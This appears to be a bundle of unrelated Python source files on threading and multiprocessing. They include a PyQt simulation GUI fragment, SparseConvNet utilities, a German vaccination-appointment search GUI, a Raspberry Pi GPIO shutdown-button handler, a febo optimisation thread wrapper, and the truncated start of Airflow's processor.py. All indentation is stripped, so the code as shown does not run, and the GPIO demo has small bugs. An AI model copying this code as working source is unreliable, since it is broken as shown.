# Generating json file
self.j_gen = GeneratorJSON(
directory,
network_configuration,
physic_configuration,
logic_configuration,
simulation_configuration
)
except:
pass
@pyqtSlot()
def start_simulation(self):
if self.j_gen is not None:
phy, logi, simu = self.j_gen.get_files_path()
self.main_thread = Thread(target=launcher.main, args=(phy, logi,))
try:
self.main_thread.start()
except ThreadError:
raise
@pyqtSlot()
def interrupt_simulation(self):
if self.main_thread is not None:
# It is not going to be easy as expected
# self.main_thread.join()
pass
@pyqtSlot()
def load_configuration(self):
physic_config = openConfigFile()
ext = physic_config.split(".")
if ext[-1] not in ["json"]:
return
if physic_config in [""]:
return
logic_config = openConfigFile()
ext = logic_config.split(".")
if ext[-1] not in ["json"]:
return
if logic_config in [""]:
return
simulation_config = openConfigFile()
ext = simulation_config.split(".")
if ext[-1] not in ["json"]:
return
if simulation_config in [""]:
return
# Generating json file
networks, workstations = LoaderJSON.load_physic_configuration(physic_config)
logic = LoaderJSON.load_logic_configuration(logic_config)
simu = LoaderJSON.load_simulation_configuration(simulation_config)
self.multi_window.clear()
self.network_configuration = NetworksConfiguration()
self.network_configuration.set_configuration(networks)
self.multi_window.addTab(self.network_configuration, "networks")
self.active_configurations = []
loaded_config = {}
# Join dictionaries by hostnames
for workstation in workstations:
for l_workstation in logic:
if workstation["hostname"] == l_workstation["hostname"]:
workstation.update(l_workstation) # Add key actions to dictionary
for simu_workstation in simu:
if workstation["hostname"] == simu_workstation["hostname"]:
workstation.update(simu_workstation) # Add key actions to dictionary
loaded_config[workstation["hostname"]] = workstation
# Creating config pages with loaded data
if "router" not in workstation["hostname"]:
config = CommonWorkstation(workstation["hostname"], "workstation")
else:
config = RouterConfiguration(workstation["hostname"])
self.active_configurations.append(config)
self.update_networks_list()
for config in self.active_configurations:
if config.workstation_name in loaded_config.keys():
config.set_configuration(loaded_config[config.workstation_name])
self.multi_window.addTab(config, config.workstation_name)
@pyqtSlot(int)
def close_tab(self, tab_index):
if tab_index != -1 and tab_index >= 1:
# Networks cannot be closed
self.multi_window.removeTab(tab_index)
self.active_configurations.pop(tab_index - 1)
@pyqtSlot()
def check_parameters(self):
corrections = ""
for workstation in self.active_configurations:
corrections += "In workstation {}\n".format(workstation.workstation_name)
workstation_status = workstation.check_values()
for key, status in workstation_status.items():
if not status:
corrections += "Parameter {} must be corrected\n".format(
key
)
pop = PopUpWidget(corrections)
pop.show()
|
utils.py | # Copyright 2016-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import torch, glob, os, numpy as np, math
from .sparseConvNetTensor import SparseConvNetTensor
from .metadata import Metadata
def toLongTensor(dimension, x):
if hasattr(x, 'type') and x.type() == 'torch.LongTensor':
return x
elif isinstance(x, (list, tuple)):
assert len(x) == dimension
return torch.LongTensor(x)
else:
return torch.LongTensor(dimension).fill_(x)
def optionalTensor(a, b):
return getattr(a, b) if hasattr(a, b) else torch.Tensor()
def optionalTensorReturn(a):
return a if a.numel() else None
def threadDatasetIterator(d):
try:
import queue
except BaseException:
import Queue as queue
import threading
def iterator():
def worker(i):
for k in range(i, len(d), 8):
q.put(d[k])
q = queue.Queue(16)
for i in range(8):
t = threading.Thread(target=worker, args=(i,))
t.start()
for _ in range(len(d)):
item = q.get()
yield item
q.task_done()
q.join()
return iterator
def concatenate_feature_planes(input):
output = SparseConvNetTensor()
output.metadata = input[0].metadata
output.spatial_size = input[0].spatial_size
output.features = torch.cat([i.features for i in input], 1)
return output
def add_feature_planes(input):
output = SparseConvNetTensor()
output.metadata = input[0].metadata
output.spatial_size = input[0].spatial_size
output.features = sum([i.features for i in input])
return output
def append_tensors(tensors):
spatial_size=tensors[0].spatial_size
dimension=len(spatial_size)
x=SparseConvNetTensor(
features=torch.cat([t.features for t in tensors],0),
metadata=Metadata(dimension),
spatial_size=spatial_size)
for t in tensors:
x.metadata.appendMetadata(t.metadata,spatial_size)
return x
class AddCoords(torch.nn.Module):
def forward(self, input):
output = SparseConvNetTensor()
if input.features.numel():
with torch.no_grad():
coords = input.get_spatial_locations()
d = (input.spatial_size.type_as(input.features)-1)/2
coords=coords[:,:-1].type_as(input.features)/ d[None,:] - 1
output.features = torch.cat([input.features,coords],1)
else:
output.features = input.features
output.metadata = input.metadata
output.spatial_size = input.spatial_size
return output
def compare_sparse(x, y):
cL,cR,L,R = x.metadata.compareSparseHelper(y.metadata, x.spatial_size)
if x.features.is_cuda:
cL=cL.cuda()
cR=cR.cuda()
L=L.cuda()
R=R.cuda()
e = 0
if cL.numel():
e += (x.features[cL]-y.features[cR]).pow(2).sum()
if L.numel():
e += x.features[L].pow(2).sum()
if R.numel():
e += y.features[R].pow(2).sum()
return e / (cL.numel() + L.numel() + R.numel())
def spectral_norm_svd(module):
w=module.weight
if w.ndimension()==3:
w=w.view(-1,w.size(2))
_,s,_=torch.svd(w)
return s[0]
def pad_with_batch_idx(x,idx): #add a batch index to the list of coordinates
return torch.cat([x,torch.LongTensor(x.size(0),1).fill_(idx)],1)
def batch_location_tensors(location_tensors):
a=[]
for batch_idx, lt in enumerate(location_tensors):
if lt.numel():
a.append(pad_with_batch_idx(lt,batch_idx))
return torch.cat(a,0)
def prepare_BLInput(l,f):
with torch.no_grad():
n=max([x.size(0) for x in l])
L=torch.empty(len(l),n,l[0].size(1),dtype=torch.int64).fill_(-1)
F=torch.zeros(len(l),n,f[0].size(1))
for i, (ll, ff) in enumerate(zip(l,f)):
L[i,:ll.size(0),:].copy_(ll)
F[i,:ff.size(0),:].copy_(ff)
return [L,F]
def checkpoint_restore(model,exp_name,name2,use_cuda=True,epoch=0):
if use_cuda:
model.cpu()
if epoch>0:
f=exp_name+'-%09d-'%epoch+name2+'.pth'
assert os.path.isfile(f)
print('Restore from ' + f)
model.load_state_dict(torch.load(f))
else:
f=sorted(glob.glob(exp_name+'-*-'+name2+'.pth'))
if len(f)>0:
f=f[-1]
print('Restore from ' + f)
model.load_state_dict(torch.load(f))
epoch=int(f[len(exp_name)+1:-len(name2)-5])
if use_cuda:
model.cuda()
return epoch+1
def is_power2(num):
return num != 0 and ((num & (num - 1)) == 0)
def is_square(num):
return int(num**0.5+0.5)**2==num
def has_only_one_nonzero_digit(num): #https://oeis.org/A037124
return num != 0 and (num/10**math.floor(math.log(num,10))).is_integer()
def checkpoint_save(model,exp_name,name2,epoch, use_cuda=True):
f=exp_name+'-%09d-'%epoch+name2+'.pth'
model.cpu()
torch.save(model.state_dict(),f)
if use_cuda:
model.cuda()
#remove previous checkpoints unless they are a power of 2 to save disk space
epoch=epoch-1
f=exp_name+'-%09d-'%epoch+name2+'.pth'
if os.path.isfile(f):
if not is_power2(epoch):
os.remove(f)
def random_rotation(dimension=3,allow_mirror=False):
r=torch.qr(torch.randn(dimension,dimension))[0]
f=torch.randint(2,(3,))
if f.sum()%2==0 and not allow_mirror:
f=1-f
return r*(2*f-1).float()
def squareroot_rotation(a):
import scipy.spatial
b=scipy.spatial.transform.Slerp(
[0,1],
scipy.spatial.transform.Rotation.from_dcm(torch.stack([torch.eye(3),a])))([0.5]).as_dcm()
return torch.from_numpy(b).float()[0]
def voxelize_pointcloud(xyz,rgb,average=True,accumulate=False):
if xyz.numel()==0:
return xyz, rgb
if average or accumulate:
xyz,inv,counts=np.unique(xyz.numpy(),axis=0,return_inverse=True,return_counts=True)
xyz=torch.from_numpy(xyz)
inv=torch.from_numpy(inv)
rgb_out=torch.zeros(xyz.size(0),rgb.size(1),dtype=torch.float32)
rgb_out.index_add_(0,inv,rgb)
if average:
rgb=rgb_out/torch.from_numpy(counts[:,None]).float()
return xyz, rgb
else:
xyz,idxs=np.unique(xyz,axis=0,return_index=True)
xyz=torch.from_numpy(xyz)
rgb=rgb[idxs]
return xyz, rgb
class checkpointFunction(torch.autograd.Function):
@staticmethod
def forward(ctx, run_function, x_features, x_metadata, x_spatial_size):
ctx.run_function = run_function
ctx.save_for_backward(x_features, x_spatial_size)
ctx.x_metadata=x_metadata
with torch.no_grad():
y = run_function(
SparseConvNetTensor
(x_features, x_metadata, x_spatial_size))
return y.features
@staticmethod
def backward(ctx, grad_y_features):
x_features, x_spatial_size = ctx.saved_tensors
x_features = x_features.detach()
x_features.requires_grad = True
with torch.enable_grad():
y = ctx.run_function(
SparseConvNetTensor
(x_features, ctx.x_metadata, x_spatial_size))
torch.autograd.backward(y.features, grad_y_features,retain_graph=False)
return None, x_features.grad, None, None
def checkpoint101(run_function, x, down=1):
f=checkpointFunction.apply(run_function, x.features, x.metadata, x.spatial_size)
s=x.spatial_size//down
return SparseConvNetTensor(f, x.metadata, s)
def matplotlib_cubes(ax, positions,colors):
from mpl_toolkits.mplot3d import Axes3D
from mpl_toolkits.mplot3d.art3d import Poly3DCollection
"""
import matplotlib.pyplot as plt
fig = plt.figure(figsize=(15,15))
ax = fig.gca(projection='3d')
...
plt.show()
"""
try:
positions=positions.numpy()
colors=colors.numpy()
X = np.array([[[0, 1, 0], [0, 0, 0], [1, 0, 0], [1, 1, 0]],
[[0, 0, 0], [0, 0, 1], [1, 0, 1], [1, 0, 0]],
[[1, 0, 1], [1, 0, 0], [1, 1, 0], [1, 1, 1]],
[[0, 0, 1], [0, 0, 0], [0, 1, 0], [0, 1, 1]],
[[0, 1, 0], [0, 1, 1], [1, 1, 1], [1, 1, 0]],
[[0, 1, 1], [0, 0, 1], [1, 0, 1], [1, 1, 1]]]).astype(np.float32)[None]-0.5
X=X+positions[:,None,None,:]
X.resize(X.shape[0]*6,4,3)
m=positions.min(0)
M=positions.max(0)+1
ax.set_xlim([m[0],M[0]])
ax.set_ylim([m[1],M[1]])
ax.set_zlim([m[2],M[2]])
ax.add_collection3d(Poly3DCollection(X,
facecolors=np.repeat(colors,6, axis=0)))
except:
print('matplotlibcubes fail!?!')
pass
ax.set_axis_off()
def matplotlib_planes(ax, positions,colors):
from mpl_toolkits.mplot3d import Axes3D
from mpl_toolkits.mplot3d.art3d import Poly3DCollection
"""
import matplotlib.pyplot as plt
fig = plt.figure(figsize=(15,15))
ax = fig.gca(projection='3d')
...
plt.show()
"""
try:
positions=positions.numpy()
colors=colors.numpy()
X = np.array([[[0, -0.5, 0.5], [0, -0.5, -0.5], [0, 0.5, -0.5], [0, 0.5, 0.5]]]).astype(np.float32)[None]
X=X+positions[:,None,None,:]
X.resize(X.shape[0]*1,4,3)
m=positions.min(0)
M=positions.max(0)+1
ax.set_xlim([m[0],M[0]])
ax.set_ylim([m[1],M[1]])
ax.set_zlim([m[2],M[2]])
ax.add_collection3d(Poly3DCollection(X,
facecolors=np.repeat(colors,1, axis=0)))
except:
pass
ax.set_axis_off()
def visdom_scatter(vis, xyz, rgb, win='3d', markersize=3, title=''):
rgb=rgb.detach()
rgb-=rgb.min()
rgb/=rgb.max()/255+1e-10
rgb=rgb.floor().cpu().numpy()
vis.scatter(
xyz.detach().cpu().numpy(),
opts={'markersize': markersize,'markercolor': rgb, 'title': title},
win=win)
def ply_scatter(name, xyz, rgb):
rgb=rgb.detach()
rgb-=rgb.min()
rgb/=rgb.max()/255+1e-10
rgb=rgb.floor().cpu().numpy()
with open(name+'.ply','w') as f:
print("""ply
format ascii 1.0
element vertex %d
property float x
property float y
property float z
property uchar red
property uchar green
property uchar blue
end_header"""%(xyz.size(0)), file = f)
for (x,y,z),(r,g,b) in zip(xyz,rgb):
print('%d %d %d %d %d %d'%(x,y,z,r,g,b),file=f)
class VerboseIdentity(torch.nn.Module):
def forward(self, x):
print(x)
return x
|
gui.py | #!/usr/bin/env python3
import os
import json
import time
import threading
import multiprocessing
from PyQt5 import QtCore, QtWidgets, uic
from PyQt5.QtGui import QIcon
from tools.exceptions import ValidationError, MissingValuesError
from tools.gui import oeffne_file_dialog_select
from tools.gui.qtzeiten import QtZeiten
from tools.gui.qtkontakt import QtKontakt
from tools.gui.qtterminsuche import QtTerminsuche
from tools.utils import create_missing_dirs
from tools import kontaktdaten as kontak_tools
from tools import Modus
PATH = os.path.dirname(os.path.realpath(__file__))
class HauptGUI(QtWidgets.QMainWindow):
# Folgende Widgets stehen zur Verfügung:
### QLineEdit ###
# i_kontaktdaten_pfad
# i_zeitspanne_pfad
### Buttons ###
# b_termin_suchen
# b_code_generieren
# b_dateien_kontaktdaten
# b_dateien_zeitspanne
# b_neue_kontaktdaten
# b_neue_zeitspanne
### Layouts ###
# prozesse_layout
### QSpinBox ###
# i_interval
def __init__(self, pfad_fenster_layout: str = os.path.join(PATH, "tools/gui/main.ui")):
"""
Main der GUI Anwendung
Args:
pfad_fenster_layout (str, optional): Ladet das angegebene Layout (wurde mit QT Designer erstellt https://www.qt.io/download).
Defaults to os.path.join(PATH, "tools/gui/main.ui").
"""
super().__init__()
create_missing_dirs(PATH)
# Laden der .ui Datei und Anpassungen
uic.loadUi(pfad_fenster_layout, self)
self.setWindowIcon(QIcon(os.path.join(PATH, "images/spritze.ico")))
# Funktionen den Buttons zuweisen
self.b_termin_suchen.clicked.connect(self.__termin_suchen)
self.b_code_generieren.clicked.connect(self.__code_generieren)
self.b_dateien_kontaktdaten.clicked.connect(self.__update_kontaktdaten_pfad)
self.b_dateien_zeitspanne.clicked.connect(self.__update_zeitspanne_pfad)
self.b_neue_kontaktdaten.clicked.connect(lambda: self.kontaktdaten_erstellen(Modus.TERMIN_SUCHEN))
self.b_neue_zeitspanne.clicked.connect(self.zeitspanne_erstellen)
# Standard Pfade
self.pfad_kontaktdaten: str = os.path.join(PATH, "data", "kontaktdaten.json")
self.pfad_zeitspanne: str = os.path.join(PATH, "data", "zeitspanne.json")
# Pfade in der GUI anzeigen
self.i_kontaktdaten_pfad.setText(self.pfad_kontaktdaten)
self.i_zeitspanne_pfad.setText(self.pfad_zeitspanne)
# Speichert alle termin_suchen Prozesse
self.such_prozesse = list(list())
self.prozesse_counter = 0
# Überwachnung der Prozesse
self.prozess_bewacher = threading.Thread(target=self.__check_status_der_prozesse, daemon=True)
self.prozess_bewacher.start()
# GUI anzeigen
self.show()
# Workaround, damit das Fenster hoffentlich im Vordergrund ist
self.activateWindow()
@staticmethod
def start_gui():
"""
Startet die GUI Anwendung
"""
app = QtWidgets.QApplication(list())
app.setAttribute(QtCore.Qt.AA_X11InitThreads)
window = HauptGUI()
app.exec_()
def kontaktdaten_erstellen(self, modus: Modus = Modus.TERMIN_SUCHEN):
"""
Ruft den Dialog für die Kontaktdaten auf
Args:
modus (Modus): Abhängig vom Modus werden nicht alle Daten benötigt. Defalut TERMIN_SUCHEN
"""
dialog = QtKontakt(self, modus, self.pfad_kontaktdaten, PATH)
dialog.show()
dialog.exec_()
def zeitspanne_erstellen(self):
"""
Ruft den Dialog für die Zeitspanne auf
"""
dialog = QtZeiten(self, self.pfad_zeitspanne, PATH)
dialog.show()
dialog.exec_()
def __termin_suchen(self):
"""
Startet den Prozess der terminsuche mit Impfterminservice.terminsuche in einem neuen Thread
Dieser wird in self.such_threads hinzugefügt.
Alle Threads sind deamon Thread (Sofort töten sobald der Bot beendet wird)
"""
try:
kontaktdaten = self.__get_kontaktdaten(Modus.TERMIN_SUCHEN)
zeitspanne = self.__get_zeitspanne()
except FileNotFoundError as error:
QtWidgets.QMessageBox.critical(self, "Datei nicht gefunden!", f"Datei zum Laden konnte nicht gefunden werden\n\nBitte erstellen")
return
except ValidationError as error:
QtWidgets.QMessageBox.critical(self, "Daten Fehlerhaft!", f"In der angegebenen Datei sind Fehler:\n\n{error}")
return
except MissingValuesError as error:
QtWidgets.QMessageBox.critical(self, "Daten Fehlerhaft!", f"In der angegebenen Datei Fehlen Daten:\n\n{error}")
return
self.__start_terminsuche(kontaktdaten, zeitspanne)
def __start_terminsuche(self, kontaktdaten: dict, zeitspanne: dict):
"""
Startet die Terminsuche. Dies nur mit einem Thread starten, da die GUI sonst hängt
Args:
kontaktdaten (dict): kontakdaten aus kontaktdaten.json
zeitspanne (dict): zeitspanne aus zeitspanne.json
"""
check_delay = self.i_interval.value()
code = kontaktdaten["code"]
terminsuche_prozess = multiprocessing.Process(target=QtTerminsuche.start_suche, name=f"{code}-{self.prozesse_counter}", daemon=True, kwargs={
"kontaktdaten": kontaktdaten,
"zeitspanne": zeitspanne,
"ROOT_PATH": PATH,
"check_delay": check_delay})
try:
terminsuche_prozess.start()
if not terminsuche_prozess.is_alive():
raise RuntimeError(
f"Terminsuche wurde gestartet, lebt aber nicht mehr!\n\nTermin mit Code: {terminsuche_prozess.getName()}\nBitte Daten Prüfen!"
)
except Exception as error:
QtWidgets.QMessageBox.critical(self, "Fehler - Suche nicht gestartet!", str(error))
else:
# QtWidgets.QMessageBox.information(self, "Suche gestartet", "Terminsuche wurde gestartet!\nWeitere Infos in der Konsole")
self.such_prozesse.append(terminsuche_prozess)
self.__add_prozess_in_gui(terminsuche_prozess)
self.prozesse_counter += 1
def __code_generieren(self):
"""
Startet den Prozess der Codegenerierung
"""
# TODO: code generierung implementieren
QtWidgets.QMessageBox.information(self, "Noch nicht verfügbar", "Funktion nur über Konsolenanwendung verfügbar")
def __get_kontaktdaten(self, modus: Modus) -> dict:
"""
Ladet die Kontakdaten aus dem in der GUI hinterlegten Pfad
Args:
modus (Modus): Abhängig vom Modus werden nicht alle Daten benötigt.
Returns:
dict: Kontakdaten
"""
if not os.path.isfile(self.pfad_kontaktdaten):
self.kontaktdaten_erstellen(modus)
kontaktdaten = kontak_tools.get_kontaktdaten(self.pfad_kontaktdaten)
return kontaktdaten
def __get_zeitspanne(self) -> dict:
"""
Ladet die Zeitspanne aus dem in der GUI hinterlegtem Pfad
Returns:
dict: Zeitspanne
"""
if not os.path.isfile(self.pfad_zeitspanne):
self.zeitspanne_erstellen()
with open(self.pfad_zeitspanne, "r", encoding='utf-8') as f:
zeitspanne = json.load(f)
# TODO: Prüfen ob Daten vollständig
return zeitspanne
def __update_kontaktdaten_pfad(self):
"""
Holt sich mithilfe des QFileDialogs eine bereits vorhandene Datei.
Dieser Pfad wird in der GUI ersetzt und im Attribut der Kasse gespeichert
"""
try:
pfad = oeffne_file_dialog_select(self, "Kontakdaten", self.pfad_kontaktdaten)
self.pfad_kontaktdaten = pfad
self.i_kontaktdaten_pfad.setText(self.pfad_kontaktdaten)
except FileNotFoundError:
pass
def __update_zeitspanne_pfad(self):
"""
Holt sich mithilfe des QFileDialogs eine bereits vorhandene Datei.
Dieser Pfad wird in der GUI ersetzt und im Attribut der Kasse gespeichert
"""
try:
pfad = oeffne_file_dialog_select(self, "Zeitspanne", self.pfad_zeitspanne)
self.pfad_zeitspanne = pfad
self.i_zeitspanne_pfad.setText(self.pfad_zeitspanne)
except FileNotFoundError:
pass
def __add_prozess_in_gui(self, prozess: multiprocessing.Process):
"""
Die Prozesse werden in der GUI in dem prozesse_layout angezeigt
"""
# addRow(label, field)
label = QtWidgets.QLabel(f"Prozess: {prozess.name}")
button = QtWidgets.QPushButton("Stoppen")
button.setObjectName(prozess.name)
button.clicked.connect(lambda: self.__stop_prozess(prozess))
self.prozesse_layout.addRow(label, button)
def __stop_prozess(self, prozess: multiprocessing.Process):
"""
Stopped den übergebenen Prozess und löscht diesen aus der GUI
Args:
prozess (multiprocessing.Process): Prozess welcher getötet werden soll
"""
prozess.kill()
self.such_prozesse.remove(prozess)
self.__remove_prozess_von_gui(prozess)
def __remove_prozess_von_gui(self, prozess: multiprocessing.Process):
"""
Entfernt die Anzeige des Prozesses aus der GUI
Args:
prozess (multiprocessing.Process): Prozess welcher entfernt werden soll
warnung (bool, optional): Warnung an den User ausgeben, dass der Prozess weg ist. Defaults to False.
"""
button = self.findChild(QtWidgets.QPushButton, prozess.name)
self.prozesse_layout.removeRow(button)
def __check_status_der_prozesse(self):
"""
Wird von einem Thread dauerhaft durchlaufen um zu prüfen ob ein Prozess sich beendet hat
"""
while True:
for prozess in self.such_prozesse:
if not prozess.is_alive():
self.__remove_prozess_von_gui(prozess)
self.such_prozesse.remove(prozess)
time.sleep(2)
def main():
"""
Startet die GUI-Anwendung
"""
multiprocessing.freeze_support()
HauptGUI.start_gui()
if __name__ == "__main__":
main()
|
physical_input.py | from threading import Thread
import os
import time
from time import sleep
import RPi.GPIO as GPIO
GPIO.setmode(GPIO.BOARD) # use board pin number (consecutive) instead of GPIO numbers.
def safe_shutdown():
PRE_SHUTDOWN_CMDS= [
"pkill -e --signal SIGINT gst-launch-1.0", # send SIGINT will trigger End of Stream on currently recording videos.
"echo GST streams ended"
]
for CMD in PRE_SHUTDOWN_CMDS:
os.system(CMD)
print("Pre-shutdown commands have run. Shutting down in 3 seconds.")
time.sleep(3)
os.system("shutdown -h now")
class Pins:
'''
Interface for watching GPIO binary inputs within another script.
Usage: Create a Pins object, then write a function that will run whenver a button is pressed (True). Then call start().
Choose among: 'shutdown', 'front_toggle', 'rear_toggle'
def safe_shutdown():
...
...
pins = Pins()
pins.setup_function('shutdown', safe_shutdown)
pins.start()
If there are any arguments to the functions, pass them as a tuple as a third argument to setup_function()
If the script is looped, and you want to access the boolean values at each loop, it can be accessed with:
while True:
... something ...
is_toggle_pin_true = pins.bool('front_toggle')
... do something with boolean switch value ...
'''
def __init__(self,
black_button_pin = 7,
hind_switch_pin = 15,
front_toggle_pin = 29,
rear_toggle_pin = 31,
):
self.pins = {
'black_button': black_button_pin,
'hind_switch' : hind_switch_pin,
'front_toggle' : front_toggle_pin,
'rear_toggle' : rear_toggle_pin,
}
self.bool = {
'black_button': False,
'hind_switch': False,
'front_toggle' : False,
'rear_toggle' : False,
}
self.fns = {
'black_button' : None,
'hind_switch' : None,
'front_toggle' : None,
'rear_toggle' : None,
}
self.fn_args = {
'black_button':None,
'hind_switch':None,
'front_toggle' : None,
'rear_toggle' : None,
}
self.flip_true= {
'black_button':False,
'hind_switch':False,
'front_toggle' : False,
'rear_toggle' : False,
}
for button in self.pins:
pin = self.pins[button]
GPIO.setup(pin, GPIO.IN)
def setup_function(self, pin_desc, function, function_args=None, flip_true=False):
'''
Set up function to run when pin is ever true
Args:
pin desc (string): pin description (see self.pins dictionary keys) ('shutdown', 'front_toggle', 'rear_toggle')
function (function): python function
function_args (list): list of function arguments
flip_true (boolean): in case switch has been installed the wrong way, flip the booleans so that 'function' runs on 'False' input.
'''
self.fns[pin_desc] = function
if function_args is not None:
if type(function_args) != list:
function_args = list(function_args)
self.fn_args[pin_desc] = function_args
self.flip_true[pin_desc] = flip_true
def start(self):
def pin_loop():
while True:
sleep(0.1)
try:
for key in self.pins:
function_args = self.fn_args[key]
function = self.fns[key]
flip_true = self.flip_true[key]
activation = GPIO.input(self.pins[key])
# genuine boolean is XOR of flip_true and activation
self.bool[key] = bool(activation) != bool(flip_true)
if bool(self.bool[key]):
if function is not None:
if function_args is not None:
function(*function_args)
else:
function()
except KeyboardInterrupt:
for source in self.bool[key]:
pin = self.pins[source]
GPIO.cleanup(pin)
p = Thread(target=pin_loop, args=([]))
p.start()
if __name__ == "__main__":
def demo_print(text, text2):
print(f"WOAHH this is something you wrote: {text}. Also, {text2}")
pins = Pins()
pins.setup_function('red_button', demo_print, ('Mr. and Mrs. Bob Vance', 'I send it back'))
pins.start()
while True:
sleep(0.1)
for button in pins.bool:
print(button, ': ', pins.bool[button])
|
thread.py | from threading import Event, Thread
from febo.algorithms import Algorithm
import sys
class ThreadAlgorithm(Algorithm):
"""
This algorithms runs a minimize route in a separate thread. Using this base class,
one can easily adapt existing `minimize` (like scipy's optimize.minimize), which
by default don't allow manual 'stepping' through the optimization via next() and
add_data(x,y).
"""
def initialize(self, **kwargs):
super().initialize(**kwargs)
self._exit_thread = False # exit flag
# events for mutual locking
self._event_x_ready = Event()
self._event_x_ready.clear()
self._event_y_ready = Event()
self._event_y_ready.clear()
# start thread
self._optimizer_thread = Thread(target=self._minimize)
self._optimizer_thread.start()
def _next(self):
# let the optimizer thread calculate x
self._event_x_ready.wait()
return self._x
def add_data(self, evaluation):
super().add_data(evaluation)
self._y = evaluation['y']
self._event_x_ready.clear()
self._event_y_ready.set()
self._event_x_ready.wait() # block main thread until next x is calculated, or optimizer thread terminates
def finalize(self):
self._exit_thread = True
self._event_y_ready.set() # unblock optimizer thread
self._optimizer_thread.join()
return super().finalize()
def _minimize(self):
self.minimize()
self._exit = True
self._event_x_ready.set() # unblock main thread
def minimize(self):
""" Start the minimize routine here.
e.g. call here: scipy.optimize.minimize(self.f, self.x0, method='Nelder-Mead')
"""
raise NotImplementedError
def f(self, x):
self._x = x
self._event_x_ready.set()
self._event_y_ready.wait()
self._event_y_ready.clear()
# if exit flag is set, terminate thread
if self._exit_thread:
sys.exit()
return -1*self._y # maximize signal, hence "-1*"
|
processor.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import datetime
import logging
import multiprocessing
import os
import signal
import threading
import time
from contextlib import redirect_stderr, redirect_stdout, suppress
from datetime import timedelta
from multiprocessing.connection import Connection as MultiprocessingConnection
from typing import Iterator, List, Optional, Set, Tuple
from setproctitle import setproctitle
from sqlalchemy import func, or_
from sqlalchemy.orm.session import Session
from airflow import models, settings
from airflow.callbacks.callback_requests import (
CallbackRequest,
DagCallbackRequest,
SlaCallbackRequest,
TaskCallbackRequest,
)
from airflow.configuration import conf
from airflow.exceptions import AirflowException, TaskNotFound
from airflow.models import SlaMiss, errors
from airflow.models.dag import DAG, DagModel
from airflow.models.dagbag import DagBag
from airflow.stats import Stats
from airflow.utils import timezone
from airflow.utils.email import get_email_address_list, send_email
from airflow.utils.log.logging_mixin import LoggingMixin, StreamLogWriter, set_context
from airflow.utils.mixins import MultiprocessingStartMethodMixin
from airflow.utils.session import NEW_SESSION, provide_session
from airflow.utils.state import State
DR = models.DagRun
TI = models.TaskInstance
class DagFileProcessorProcess(LoggingMixin, MultiprocessingStartMethodMixin):
"""Runs DAG processing in a separate process using DagFileProcessor
:param file_path: a Python file containing Airflow DAG definitions
:param pickle_dags: whether to serialize the DAG objects to the DB
:param dag_ids: If specified, only look at these DAG ID's
:param callback_requests: failure callback to execute
"""
# Counter that increments every time an instance of this class is created
class_creation_counter = 0
def __init__(
self,
file_path: str,
pickle_dags: bool,
dag_ids: Optional[List[str]],
callback_requests: List[CallbackRequest],
):
super().__init__()
self._file_path = file_path
self._pickle_dags = pickle_dags
self._dag_ids = dag_ids
self._callback_requests = callback_requests
# The process that was launched to process the given .
self._process: Optional[multiprocessing.process.BaseProcess] = None
# The result of DagFileProcessor.process_file(file_path).
self._result: Optional[Tuple[int, int]] = None
# Whether the process is done running.
self._done = False
# When the process started.
self._start_time: Optional[datetime.datetime] = None
# This ID is use to uniquely name the process / thread that's launched
# by this processor instance
self._instance_id = DagFileProcessorProcess.class_creation_counter
self._parent_channel: Optional[MultiprocessingConnection] = None
DagFileProcessorProcess.class_creation_counter += 1
@property
def file_path(self) -> str:
return self._file_path
@staticmethod
def _run_file_processor(
result_channel: MultiprocessingConnection,
parent_channel: MultiprocessingConnection,
file_path: str,
pickle_dags: bool,
dag_ids: Optional[List[str]],
thread_name: str,
callback_requests: List[CallbackRequest],
) -> None:
"""
Process the given file.
:param result_channel: the connection to use for passing back the result
:param parent_channel: the parent end of the channel to close in the child
:param file_path: the file to process
:param pickle_dags: whether to pickle the DAGs found in the file and
save them to the DB
:param dag_ids: if specified, only examine DAG ID's that are
in this list
:param thread_name: the name to use for the process that is launched
:param callback_requests: failure callback to execute
:return: the process that was launched
:rtype: multiprocessing.Process
"""
# This helper runs in the newly created process
log: logging.Logger = logging.getLogger("airflow.processor")
# Since we share all open FDs from the parent, we need to close the parent side of the pipe here in
# the child, else it won't get closed properly until we exit.
log.info("Closing parent pipe")
parent_channel.close()
del parent_channel
set_context(log, file_path)
setproctitle(f"airflow scheduler - DagFileProcessor {file_path}")
try:
# redirect stdout/stderr to log
with redirect_stdout(StreamLogWriter(log, logging.INFO)), redirect_stderr(
StreamLogWriter(log, logging.WARN)
), Stats.timer() as timer:
# Re-configure the ORM engine as there are issues with multiple processes
settings.configure_orm()
# Change the thread name to differentiate log lines. This is
# really a separate process, but changing the name of the
# process doesn't work, so changing the thread name instead.
threading.current_thread().name = thread_name
log.info("Started process (PID=%s) to work on %s", os.getpid(), file_path)
dag_file_processor = DagFileProcessor(dag_ids=dag_ids, log=log)
result: Tuple[int, int] = dag_file_processor.process_file(
file_path=file_path,
pickle_dags=pickle_dags,
callback_requests=callback_requests,
)
result_channel.send(result)
log.info("Processing %s took %.3f seconds", file_path, timer.duration)
except Exception:
# Log exceptions through the logging framework.
log.exception("Got an exception! Propagating...")
raise
finally:
# We re-initialized the ORM within this Process above so we need to
# tear it down manually here
settings.dispose_orm()
result_channel.close()
def start(self) -> None:
"""Launch the process and start processing the DAG."""
start_method = self._get_multiprocessing_start_method()
context = multiprocessing.get_context(start_method)
_parent_channel, _child_channel = context.Pipe(duplex=False)
process = context.Process(
target=type(self)._run_file_processor,
args=(
_child_channel,
_parent_channel,
self.file_path,
self._pickle_dags,
self._dag_ids,
f"DagFileProcessor{self._instance_id}",
self._callback_requests,
),
name=f"DagFileProcessor{self._instance_id}-Process",
)
self._process = process
self._start_time = timezone.utcnow()
process.start()
# Close the child side of the pipe now the subprocess has started -- otherwise this would prevent it
# from closing in some cases
_child_channel.close()
del _child_channel
# Don't store it on self until after we've started the child process - we don't want to keep it from
# getting GCd/closed
self._parent_channel = _parent_channel
def kill(self) -> None:
